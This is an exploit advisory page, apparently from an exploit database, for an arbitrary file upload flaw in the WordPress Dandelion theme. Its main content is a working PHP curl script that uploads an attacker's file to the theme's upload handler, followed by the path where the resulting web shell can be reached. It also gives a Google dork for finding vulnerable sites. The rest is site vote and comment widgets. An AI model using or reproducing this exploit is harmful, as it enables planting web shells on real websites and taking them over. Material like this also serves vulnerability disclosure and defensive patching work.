WordPress Dandelion Theme Shell Upload

2014.02.07
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: Wordpress Dandelion Themes Arbitry File Upload # Google Dork: inurl:/wp-content/themes/dandelion/ # Date: 31/01/2014 # Exploit Author: TheBlackMonster (Marouane) # Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628 # Software Link: Not Available # Version: Web Application # Tested on: Mozilla, Chrome, Opera -> Windows & Linux ?#?Greetz? : PhantomGhost, Deto Beiber, All Moroccan Hackers. We are Moroccans, we are genuis ! <?php $uploadfile="yourfile.php"; $ch = curl_init("http://127.0.0.1/wp-content/themes/dandelion/functions/upload-handler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> File Access : http://127.0.0.1/uploads/[years]/[month]/your_shell.php

References:

http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top